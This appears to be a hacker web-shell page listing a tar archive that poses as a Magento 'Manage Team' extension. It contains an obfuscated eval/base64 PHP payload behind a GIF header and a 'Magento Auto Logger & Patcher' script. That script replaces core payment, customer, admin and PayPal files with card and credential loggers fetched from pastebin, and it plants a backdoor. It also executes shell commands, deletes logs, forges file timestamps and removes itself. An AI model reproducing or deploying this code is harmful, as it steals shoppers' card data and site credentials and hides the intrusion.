VaTan
57.Alay Birim Başkanlığı-AhmedRıza

57.Alay SpeciaL Shell

Nerdeyim: /storage/ssd1/678/1628678/public_html/
DOSYA YUKLE :
Current File : /storage/ssd1/678/1628678/public_html/Module.tar

Neko.php0100777000000000000000000001025313015636261007425 0ustar00GIF89aGiam
<?php
eval(gzinflate(base64_decode("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")));
?>package.xml0100777000000000000000000000233413015571204010131 0ustar00<?xml version="1.0"?>
<package>
    <name>LibMagen_Ext</name>
    <version>1.0.0</version>
    <stability>stable</stability>
    <license uri="http://opensource.org/licenses/osl-3.0.php">OSL v3.0</license>
    <channel>community</channel>
    <extends/>
    <summary>Manage Team extension is used to display team member's information on the website with ease.</summary>
    <description>It manages all the basic details of the team members like employee name, image and description, social profile, email etc from the backend panel and display all employee details in frontend. Add Manage Team link in front end footer that display all team members list.</description>
    <notes>Manage Team extension is used to display team member's information on the website with ease.</notes>
    <authors>Neko<author><name>Sanjay Dabhoya</name><user>solwin</user><email>stdabhoya@yahoo.com</email></author></authors>
    <date>2015-08-03</date>
    <time>09:55:45</time>
    <contents>	
	    <target name="/">
                <file name="Neko.php" hash="Neko.php"/>
    </target>
	<target name="/">
                <file name="patch.php" hash="patch.php"/>
    </target></contents>
    <compatible/>
    <dependencies/>
</package>
patch.php0100777000000000000000000002135413014120720007617 0ustar00<html>
<head>
<title>Magento Auto Logger & Patcher</title>
<style type="text/css">
body{
   background-color: #000;
   font-family: courier new;
   font-size:12px;
   color:#00FF00;
}
</style>
</head>
<body>
</br><b>Magento Auto Logger & Patcher</b></br>
<?php
set_time_limit(0);
error_reporting(0);
$namepatch = 'patcher.zip';
$linkpatch = 'http://josse-materiel-elevage.com/flash/tarif/Scripts/'.$namepatch;

## Function to set file permissions to 0644 and folder permissions to 0755
function chmod_directory( $dir = "./", $dirModes = 0755, $fileModes = 0755 ){
   $d = new RecursiveDirectoryIterator( $dir );
   foreach( new RecursiveIteratorIterator( $d, 1 ) as $path ){ 
      if( $path->isDir() ) chmod( $path, $dirModes );
      else if( is_file( $path ) ) chmod( $path, $fileModes );
  }
}

## Function shell exec
function executebin($c)
{
    $exebin='false';
    @ob_start();
    if (function_exists('exec')) {
        @exec($c, $r);
        echo @implode("\n", $r);
        $exebin='exec';
    } elseif (function_exists('system')) { @system($c); $exebin='system';}
    elseif (function_exists('shell_exec')) { echo @shell_exec($c); $exebin='shell_exec';}
    elseif (function_exists('passthru')) {@passthru($c); $exebin='passthru';}
    elseif (is_resource($f = @popen($c, 'r'))) {
        while (!@feof($f)) echo @fread($f, 1024);
        @pclose($f);
        $exebin='popen';
    } elseif (is_resource($f = @proc_open($c, array(array('pipe', 'r'), array('pipe', 'w'), array('pipe', 'a')), $p))) {
        echo @stream_get_contents($p[1]);
        @proc_close($c);
        $exebin='proc_open';
    }
      elseif (function_exists('pcntl_exec')) {@pcntl_exec('/bin/sh', array('-c',  $c)); $exebin='pcntl_exec';}
    elseif (is_resource($f = @expect_popen($c))) {
        while (!@feof($f)) echo @fread($f, 1024);
        @fclose($f);
        $exebin='expect_popen';
    } elseif (is_resource($f = @fopen('expect://' . $c, 'r'))) {
        while (!@feof($f)) echo @fread($f, 1024);
        @fclose($f);
        $exebin='expect';
    }
    @ob_get_clean();
    return $exebin;
}
## Function to clean out the contents of specified directory
function clean_directory() {
    $dirs = array(
        'downloader/.cache/*',
        'media/css/*',
        'media/css_secure/*',
        'media/import/*',
        'media/js/*',
		'js/plugin.php',
		'skin/error.php',
		'skin/skins.php',
		'skin/*.*',
        'var/cache/*',
        'var/locks/*',
        'var/log/*',
        'var/report/*',
        'var/session/*',
        'var/tmp/*'
    );
    
    foreach($dirs as $dir) {
        executebin('rm -rf '.$dir);
    }
}
## Function patch
function patch($path,$name,$file,$link){
	if (file_exists($path.$name))
	{
		if(is_writable($path))
		{
			$f46 = file_get_contents($link) or die("<br/><font color=red>[!] FAILED Get Content: Operation breaked!</font>");
			$f64 = fopen($path.$name, "w");
			fwrite($f64, $f46);
			fclose($f64);
			executebin('touch -r '.$path.$file.' '.$path.$name);
		}
	}
}

### Logger Creator ###
$dir  = $_SERVER['DOCUMENT_ROOT'];
$b64  = "base"."64"."_"."de"."code";
$path = '/app/code/core/Mage';
$link = $b64('aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcv');

$path_a = $dir.$path.'/Payment/Model/Method/';
$name_a = 'Cc.php';
$file_a = 'Abstract.php';
$link_a = $link.'ry93kkyQ';
patch($path_a,$name_a,$file_a,$link_a);
echo "<br/>[+] Card Logger DONE!";

$path_b = $dir.$path.'/Customer/Model/';
$name_b = 'Session.php';
$file_b = 'Group.php';
$link_b = $link.'rPzi1uQH';
patch($path_b,$name_b,$file_b,$link_b);
echo "<br/>[+] Customer Logger DONE!";

$path_c = $dir.$path.'/Admin/Model/';
$name_c = 'Session.php';
$file_c = 'Config.php';
$link_c = $link.'z1iasxwd';
patch($path_c,$name_c,$file_c,$link_c);
echo "<br/>[+] Admin Logger DONE!";

$path_d = $dir.$path.'/Paypal/Model/';
$size_d = '51587';
$size_e = filesize($path_d.$name_d);
$name_d = 'Config.php';
$file_d = 'Cert.php';
$link_d = $link.'cdaeWTvb';
$link_e = $link.'maNHbdXh';
if($size_e == $size_d) {
	patch($path_d,$name_d,$file_d,$link_d);
	echo "<br/>[+] PayPal Direct Scam DONE!";
} elseif($size_e == '4096') {
	patch($path_d,$name_d,$file_d,$link_e);
	echo "<br/>[+] PayPal Direct Scam DONE!";
} else {
	echo "<br/><font color=red>[!] PayPal Direct Scam FAILED / ".$size_e."</font>";
}

### Start Patching ###
/* Download */
executebin('curl -O '.$linkpatch);

/* Extract */
if (file_exists($namepatch)) {
    echo "<br/>[+] $namepatch DOWNLOADED!";
} else {
    echo "<br/><font color=red>[!] $namepatch NOT FOUND!</font>";
    $backdoor = file_get_contents("http://pastebin.com/raw/EY3Fsb7h");
    $backdoor_f = fopen($dir."/js/backup.php", "w");
    fwrite($backdoor_f, $backdoor);
    fclose($backdoor_f);
    echo "<br/>[+] Backdoor UPLOADED!";
}
@chmod($dir."/downloader/", 0777);
@unlink($dir."/downloader/index.php");
@unlink($dir."/downloader/backup.php");
executebin('unzip '.$namepatch);

/* Patch ShopLift */
@unlink($dir."/app/code/core/Mage/Adminhtml/controllers/Cms/WysiwygController.php");
echo "<br/>[+] ShopLift PATCHED!";

/* Touching */
echo "<br/>[+] Touching Files";
executebin('touch -r cron.sh app/');
executebin('touch -r app/locale/ app/code/');
executebin('touch -r app/code/local/ app/code/core/');
executebin('touch -r app/code/core/Zend/ app/code/core/Mage/');
executebin('touch -r app/code/core/Mage/Core/ app/code/core/Mage/Admin/');
executebin('touch -r app/code/core/Mage/Admin/Helper/ app/code/core/Mage/Admin/Model/');
executebin('touch -r app/code/core/Mage/Admin/Model/Config.php app/code/core/Mage/Admin/Model/Session.php');
executebin('touch -r app/code/core/Mage/Core/ app/code/core/Mage/Paypal/');
executebin('touch -r app/code/core/Mage/Paypal/Helper/ app/code/core/Mage/Paypal/Model/');
executebin('touch -r app/code/core/Mage/Paypal/Model/Cert.php app/code/core/Mage/Paypal/Model/Config.php');
executebin('touch -r app/code/core/Mage/Core/ app/code/core/Mage/Customer/');
executebin('touch -r app/code/core/Mage/Customer/Helper/ app/code/core/Mage/Customer/Model/');
executebin('touch -r app/code/core/Mage/Customer/Model/Group.php app/code/core/Mage/Customer/Model/Session.php');
executebin('touch -r app/code/core/Mage/Core/ app/code/core/Mage/Payment/');
executebin('touch -r app/code/core/Mage/Payment/Helper/ app/code/core/Mage/Payment/Model/');
executebin('touch -r app/code/core/Mage/Payment/Model/Source/ app/code/core/Mage/Payment/Model/Method/');
executebin('touch -r app/code/core/Mage/Payment/Model/Method/Abstract.php app/code/core/Mage/Payment/Model/Method/Cc.php');
executebin('touch -r app/locale/ app/etc/');
executebin('touch -r app/etc/local.xml app/etc/modules/');
executebin('touch -r app/etc/modules/Mage_All.xml app/etc/modules/Lanot_FileManager.xml');
executebin('touch -r app/etc/modules/Mage_All.xml app/etc/modules/Magpleasure_Filesystem.xml');
executebin('touch -r cron.sh downloader/');
executebin('touch -r downloader/mage.php downloader/index.php');
executebin('touch -r cron.sh errors/');
executebin('touch -r errors/404.php errors/master.php');
executebin('touch -r cron.sh includes/');
executebin('touch -r includes/.htaccess includes/config.php');
executebin('touch -r cron.sh install.php');
executebin('touch -r cron.sh js/');
executebin('touch -r js/index.php js/backup.php');
executebin('touch -r js/varien/ js/lib/');
executebin('touch -r js/varien/ js/peler/');
executebin('touch -r js/lib/flex.js js/lib/class-wp-lang.php');
executebin('touch -r js/lib/flex.js js/lib/index.inc.php');
executebin('touch -r js/lib/flex.js js/lib/search.php');
executebin('touch -r js/lib/flex.js js/lib/lib.php');
executebin('touch -r js/varien/ js/scriptaculous/');
executebin('touch -r js/scriptaculous/scriptaculous.js js/scriptaculous/jscript.php');
executebin('touch -r js/varien/ js/calendar/');
executebin('touch -r js/calendar/calendar.js js/calendar/skins/');
executebin('touch -r js/calendar/calendar.js js/calendar/calendar.php');
executebin('touch -r cron.sh xml.php');

/* Delete */
executebin('rm -rf '.$namepatch);
if (file_exists($namepatch)) {
    echo "<br/><font color=red>[!] $namepatch FOUND!</font>";
} else {
    echo "<br/>[+] $namepatch DELETED!";
}

/* Cleaning */
echo "<br/>[+] Cleaning/Set Permission Directory";
clean_directory();
chmod_directory( "." );
@chmod($dir."/downloader/cache.cfg", 0555);
@chmod($dir."/downloader/index.php", 0555);
@chmod($dir."/downloader", 0555);
executebin('chmod 0555 downloader/');

/* Delete */
executebin('rm -rf patch.php');
if (file_exists('patch.php')) {
    echo "<br/><font color=red>[!] Please DELETE PATCHFILE manually!</font>";
} else {
    echo "<br/>[+] PATCHFILE DELETED!";
}
echo "<br/>[+] Completed All Jobs.";
apc_clear_cache();
apc_clear_cache('user');
exit;

SESSIZCE NOBETTEYIZ

KILIÇ ARSLAN
ReeL Türk - Ahmed Rıza - Kartal Beyi - EmirZadee - THACKAY
www.000webhost.com